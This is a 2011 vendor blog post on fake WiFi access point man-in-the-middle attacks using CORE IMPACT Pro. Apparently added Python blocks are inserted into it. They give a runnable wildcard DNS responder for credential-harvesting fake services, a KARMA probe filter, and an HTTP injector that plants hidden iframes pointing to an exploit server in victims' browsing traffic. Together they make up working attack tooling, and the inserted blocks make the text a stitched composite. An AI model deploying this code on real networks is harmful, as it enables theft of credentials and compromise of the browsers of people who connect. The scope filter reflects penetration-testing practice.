Pick an Access Point, any Access Point: Assessing Man-in-the-Middle Threats Over WiFi

March 31, 2011

One of the things that I love about working for Core is our freedom to work on things that we are interested in. Instead of being expected to focus 100% on the project du jour and produce x lines of code per day, our exploit developers are given the opportunity to work on those areas that they would spend their evenings and weekends tinkering with.

An example of this that springs to mind is one involving Core Security developer Andrés Blanco. Andrés used to research WiFi from home, so he was a natural fit for the WiFi team when our customers asked us to develop WiFi penetration testing capabilities for IMPACT Pro. Now, every time I ask him what he is working on or what he is thinking about in the world of WiFi, I walk away excited about the current WiFi capabilities and the roadmap for WiFi penetration testing within IMPACT Pro. Often I am amazed at how many issues I thought I had seen the last of in the 90’s have been brought back to life thanks to WiFi.

I asked Andrés to walk us through the new capabilities of IMPACT Pro to create a Fake Access Point to try and lure WiFi clients into connecting to our AP – when this happens we have complete access to all the victims’ traffic and can start performing Man-in-the-Middle attacks against them.

But enough from me – let’s hand things over to Andrés …

- Alex Horan, Sr. Product Manager


Thanks Alex. As you know, these days it is common to see corporate employees using mobile devices (and by mobile devices I mean a wide range of hardware: notebooks, netbooks, tablets, smartphones and so on) to do their daily work. Targeting these devices is a good way to gain access to the target corporate network, or to obtain the credentials needed to impersonate a legitimate user and enter it. One of the biggest advantages of attacking mobile devices is that whatever network security protects a device inside the corporate perimeter evaporates once the device leaves it. Needless to say, employees generally take no particular precautions when they connect to their favorite coffee shop hotspot.

There are several ways of attacking mobile devices. The attack vector described in this article is a MiTM attack: we create a fake Access Point to attract these devices to connect to and use, and by doing so they open themselves up to attack.

Using CORE IMPACT PRO we can perform this attack in two different modes: ICS and Offline. ICS mode shares the Internet connection we already have with any WiFi victim that connects to the fake Access Point. Giving victims Internet access opens up many MiTM attacks, ranging from gathering credentials as the victims authenticate to services on the Internet to inserting client-side exploits into the traffic going back to them. Offline mode neither requires nor provides Internet access. Thanks to a recent update, IMPACT Pro can create a fake Internet for you and let the client interact with it (fake DNS server, fake POP3 server, fake SMB server, fake HTTP server, etc.); each of those tries to extract credentials and other information from any client that connects to it.
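The piece that makes Offline mode's "fake Internet" work is a DNS server that resolves every name to the fake AP itself, so that whatever hostname the victim's mail client or browser asks for, the connection lands on one of the fake services. The following is an added example of that idea, not IMPACT Pro's own code: it parses a raw DNS query, answers every A/IN question with the AP's own address (assumed here to be 10.0.0.1), and answers other record types with an empty NOERROR so the client does not fall back to another resolver. The sample query is constructed in the block.

```python
"""Wildcard DNS responder for an offline fake-AP 'fake Internet' (added example)."""
import socket
import struct

FAKE_AP_IP = "10.0.0.1"   # assumption: the address of the fake AP's own interface


def parse_query(packet: bytes):
    """Return (txid, qname, qtype, qclass, raw_question) from a single-question DNS query."""
    if len(packet) < 12:
        raise ValueError("too short for a DNS header")
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if flags & 0x8000:
        raise ValueError("not a query (QR bit set)")
    if qdcount != 1:
        raise ValueError("only single-question queries are handled")
    offset = 12
    labels = []
    while True:
        length = packet[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointers are not expected in a question")
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    qtype, qclass = struct.unpack("!HH", packet[offset:offset + 4])
    offset += 4
    return txid, ".".join(labels), qtype, qclass, packet[12:offset]


def build_response(packet: bytes, answer_ip: str = FAKE_AP_IP, ttl: int = 60) -> bytes:
    """A/IN questions get answer_ip; anything else gets NOERROR with zero answers."""
    txid, _qname, qtype, qclass, question = parse_query(packet)
    answers = b""
    ancount = 0
    if qtype == 1 and qclass == 1:
        # 0xC00C is a compression pointer to the question name at offset 12
        answers = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(answer_ip)
        ancount = 1
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, ancount, 0, 0)  # QR, RD, RA set
    return header + question + answers


def resolved_address(response: bytes):
    """Extract the A-record address from a response built above (None if it carries no answer)."""
    ancount = struct.unpack("!H", response[6:8])[0]
    if ancount == 0:
        return None
    return socket.inet_ntoa(response[-4:])


def encode_query(name: str, txid: int = 0x1234, qtype: int = 1) -> bytes:
    """Constructed query, encoded the way a stub resolver would send it."""
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def serve(bind_ip: str = FAKE_AP_IP, port: int = 53):
    """UDP loop answering every query on the fake AP interface (binding port 53 needs root)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_ip, port))
    while True:
        data, peer = sock.recvfrom(512)
        try:
            sock.sendto(build_response(data), peer)
        except ValueError:
            continue  # malformed or unsupported query: drop it rather than crash the responder


if __name__ == "__main__":
    # Constructed sample: the victim asks for www.example.com and gets the fake AP back.
    print(resolved_address(build_response(encode_query("www.example.com"))))
```

Run `serve()` on the AP's own interface to use it for real; note that this answers literally every name, including the update and captive-portal checks a client performs on connect, which is exactly what sends those clients to the fake HTTP, POP3 and SMB servers.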

Injecting client-side exploits into real HTTP traffic is a nice way to hide a web browser exploit, and doing this with CORE IMPACT PRO is pretty easy. I'll come back to it after we create the Fake Access Point.

We start by executing the Fake Access Point module; for this attack it needs to run in ICS mode. It is recommended to change the default values of the ESSID and BSSID parameters.

Once the Fake Access Point module is running we execute the Fake AP HTTP Client-Side Exploit Injection module. It can be found under WiFi/Attack/Client Attack/Fake Access Point – Karma Attack/MiTM.

The parameters of almost every Fake Access Point – Karma Attack/MiTM module are the same.

The module parameters are the following:

  • TARGET: the Fake Access Point the module runs against.
  • MODULE: the client-side exploit we want to inject.
  • URL-FILTER: a filter on the URLs into whose responses the exploit is injected.

With this environment set up, we have to wait for targets to connect to us, which depends on many things. We could attract clients using the KARMA feature of the Fake Access Point module, but we have to be careful not to attract stations we don't want to attack: KARMA answers stations' probe requests for whatever network they are looking for, so it pulls in every device in range that is probing, not only the ones in scope.
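One way to keep a KARMA-style responder inside the engagement's scope is to answer probe requests only from station MACs on an allowlist. The block below is an added example, not IMPACT Pro's own code: it parses raw 802.11 management frames (the 24-byte header followed by tagged parameters), extracts the probing station and the SSID it asked for, and decides whether to reply. The frames, MAC addresses and SSIDs are constructed for illustration; actually transmitting the probe response is left to whatever injection interface is in use.

```python
"""Scoped KARMA probe handling: only answer probe requests from in-scope stations (added example)."""
import struct

MGMT_TYPE = 0
PROBE_REQUEST_SUBTYPE = 4
TAG_SSID = 0


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_probe_request(frame: bytes):
    """Return (station_mac, requested_ssid) for a probe request, or None for any other frame."""
    if len(frame) < 24:
        return None
    fc = frame[0]                  # first Frame Control byte: version | type | subtype
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    if ftype != MGMT_TYPE or subtype != PROBE_REQUEST_SUBTYPE:
        return None
    station = mac_str(frame[10:16])  # addr2 = transmitter = the probing station
    ssid = ""
    offset = 24                      # tagged parameters start right after the header
    while offset + 2 <= len(frame):
        tag, length = frame[offset], frame[offset + 1]
        value = frame[offset + 2:offset + 2 + length]
        if len(value) < length:
            break                    # truncated tag: stop rather than read past the frame
        if tag == TAG_SSID:
            ssid = value.decode("utf-8", errors="replace")
            break
        offset += 2 + length
    return station, ssid


def should_answer(frame: bytes, targets: set):
    """Decide whether the responder replies to this frame; returns (answer, reason).

    Replying only to stations in `targets` is what keeps the fake AP from luring
    bystanders. Wildcard (empty-SSID) probes get the same treatment: replying to them
    with our chosen ESSID is precisely what attracts a station whose preferred
    network list we do not know, so they must be scoped too.
    """
    parsed = parse_probe_request(frame)
    if parsed is None:
        return False, "not a probe request"
    station, ssid = parsed
    if station not in targets:
        return False, f"{station} not in scope"
    return True, f"answer {station} probing for {ssid!r}"


def build_probe_request(station: bytes, ssid: str) -> bytes:
    """Constructed frame for testing: FC 0x0040 (mgmt/probe request), broadcast addr1/addr3."""
    bcast = b"\xff" * 6
    header = (struct.pack("<H", 0x0040) + struct.pack("<H", 0)   # frame control, duration
              + bcast + station + bcast + struct.pack("<H", 0))  # addr1, addr2, addr3, seq ctrl
    ssid_tag = bytes([TAG_SSID, len(ssid)]) + ssid.encode()
    rates_tag = bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])             # supported rates 1/2/5.5/11 Mbit
    return header + ssid_tag + rates_tag


if __name__ == "__main__":
    scope = {"00:11:22:33:44:55"}
    for frame in (build_probe_request(bytes.fromhex("001122334455"), "CoffeeShop"),
                  build_probe_request(bytes.fromhex("66778899aabb"), "CoffeeShop")):
        print(should_answer(frame, scope))
```

The allowlist is the important part; the same decision function can be extended with a per-engagement SSID list so that a target station only ever sees the networks the tester has agreed to impersonate.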

Let's check what happens on the client side.

The client connects to the Access Point and opens a browser to surf the web.

But if you look closely, there is something funny in the browser screenshot above. Let's talk about what happens in the background while the user browses the web. Every HTTP request we handle through our Access Point has its response modified on the fly: a WBA (Web Browser Agent) is injected that adds an iframe pointing at the exploit to the DOM of the original page. The user will never notice a difference in their browsing experience, but that browser is probably owned by us ...
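To make the on-the-fly modification concrete, here is an added example of the injection step; it is not IMPACT Pro's WBA or its own code. It mirrors the URL-FILTER and MODULE parameters above: `url_filter` is assumed to be a shell-style wildcard pattern, and `exploit_url` stands in for wherever the chosen client-side exploit is served from (assumed here to be the fake AP itself). It rewrites only plain HTML responses, because injecting into a gzip-compressed or chunked body without decoding it first produces a broken page that the user would notice, and it fixes Content-Length so the browser reads the whole modified body. The sample response is constructed.

```python
"""Inject a hidden exploit iframe into proxied HTTP responses matching a URL filter (added example)."""
import fnmatch

EXPLOIT_URL = "http://10.0.0.1/wba/"   # assumption: the exploit page is served by the fake AP


def matches_filter(url: str, url_filter: str) -> bool:
    """URL-FILTER semantics assumed here: fnmatch-style wildcard over the full request URL."""
    return fnmatch.fnmatch(url, url_filter)


def inject(response: bytes, url: str, url_filter: str = "*", exploit_url: str = EXPLOIT_URL) -> bytes:
    """Return the response with an invisible iframe added, or unchanged when injection is unsafe."""
    if not matches_filter(url, url_filter):
        return response
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        return response                     # no complete header block yet
    status_line, *header_lines = head.split(b"\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    # Only rewrite uncompressed, non-chunked HTML; anything else must be decoded first.
    if not headers.get(b"content-type", b"").lower().startswith(b"text/html"):
        return response
    if headers.get(b"content-encoding") or headers.get(b"transfer-encoding"):
        return response
    payload = (b'<iframe src="' + exploit_url.encode() +
               b'" width="0" height="0" style="display:none"></iframe>')
    # Place the iframe just before </body> so the page renders exactly as before; else append.
    idx = body.lower().rfind(b"</body>")
    new_body = body[:idx] + payload + body[idx:] if idx != -1 else body + payload
    # The body grew: rewrite Content-Length or the browser truncates (or stalls on) the page.
    new_headers = []
    for line in header_lines:
        if line.lower().startswith(b"content-length:"):
            new_headers.append(b"Content-Length: " + str(len(new_body)).encode())
        else:
            new_headers.append(line)
    return b"\r\n".join([status_line] + new_headers) + b"\r\n\r\n" + new_body


# Constructed sample response, as the fake AP would see it coming back from the real site.
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Content-Type: text/html; charset=utf-8\r\n"
                   b"Content-Length: 38\r\n\r\n"
                   b"<html><body><p>hello</p></body></html>")

if __name__ == "__main__":
    print(inject(SAMPLE_RESPONSE, "http://www.example.com/", "*example.com*").decode())
```

Responses that declare `Content-Encoding: gzip` are common, so a production injector decompresses, injects and recompresses (or strips `Accept-Encoding` from the client's request so the server sends plain text); the example above simply leaves such responses alone.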

We can now return to our CORE IMPACT PRO workspace and be very happy with the new IMPACT Agent that has been deployed.

To end this post, I want to add that there are a lot more Fake Access Point MiTM modules that can be used via this attack vector. Happy WiFi hunting!

-  Andrés Blanco, Developer

